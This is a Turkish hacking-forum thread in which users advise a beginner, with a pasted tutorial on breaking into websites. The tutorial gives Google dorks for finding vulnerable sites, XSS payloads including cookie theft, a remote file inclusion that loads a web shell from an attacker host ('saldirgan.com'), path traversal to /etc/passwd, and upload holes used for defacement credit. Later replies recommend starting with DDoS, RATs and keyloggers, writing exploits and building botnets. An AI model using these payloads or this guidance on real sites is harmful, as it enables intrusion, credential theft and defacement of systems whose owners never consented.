(mesela) python c++ c #f javascprit gibi bir daha çok kodlama dilibir sürü hacking forumları var etik hacker vb o forumlardan açıklar vb gibi konuları öğrenebilirsin ve kali lenux ve termuxuda öğrenmeni tavsiye ederim
eyweline sağlık
Reis hackerlığı öğrenmek için bir akıl hocasına gerek yok bunun için sistemlerin nasıl işlediğini bu sistemlerin programlama dillerini öğrenmen lazım
Java, Java script, asp , html , php türü web tasarım dan başlaman lazım şuan
SQL Açığı Nedir?
Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile
SQL Açığı Dorkları
SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;
Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.
XSS (Cross Site Scripting) Açığı Nedir?
Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?
PHP için XSS açık kodu ;
< script>alert("hacklendin")</script>
Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("hacklendin")</script>
ASP için XSS açık kodu ;
">< script>alert("hacklendin")</script>
Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("hacklendin")</script>
Cookiesleri çekmek için kod ;
< script>alert (d o c u m e n t.cookie);</script>
Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız
XSS Açığı Bulma Dorkları
Kod:
inurl:search.php?ID=
RFI Açığı Nedir?
Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.
RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.
Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.
LFI Açığı Nedir?
Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.
2 - Tamper Data Eklentisini yükleyelim.
Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.
Upload Açığı Nedir?
Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.
Upload Açığı Dorkları
Kod:
inurl: uploadbutton.html
Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;
1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.
Reis, these are familiar, but you can learn how to code the hack sites and get a zone record with them. Apart from that, you can produce debugging tools with python and ruby besides the middle level English, and you can leak or try the ports, but my advice is at a very high level. If you don't know, don't use the hacking tools written by others because almost all of them have trojans and you will get botnets.
After that, you have to learn a little more c, c ++, c #, you can make an ancestor for all languages of c, prepare exploids with c ++ or create a botnet interface for C # and ddos.
[/ QUOTE]
Wow they seems easy but then hard work
program dili ögren tavsiyem html sonra formdaki konulara bak gerisi gelir ama emek harcaman gerek hack işlemi genel bi kavram her konuyu kapsıyorGerekiyorda
Ddos rat keylogger gibi kolay windows hacklerinden başlaProram Dillerini Çok iyi bilmediğim için ben bile kendimi hacker olarak görmüyorum. bir kaç dork bilmek veya sql açıklı siteye sqlmap ile dalmak bence hackerlik değil. başlanğıç ilk olarak sana tavsiyem program dillerini ögrenmen. ben mesela ezbere iş yaparım. denneme yanılma ile. ilk başlağım zamanlarda. 3 saat pes etmeden siteyi hacklemeyi falan deniyordum. bu çıktığın yolda başarılar dilerim.
Aynen öyle, ben 3 senedir ögrenmeye calisiyorum. Daha yeni ögrendim SQL falan.Yani
kardeşim bana kalırsa git ilk önce udemy kurslardan başlaGerekiyorda
katılıyorum udemy ile daha rahat öğrenirsinkardeşim bana kalırsa git ilk önce udemy kurslardan başla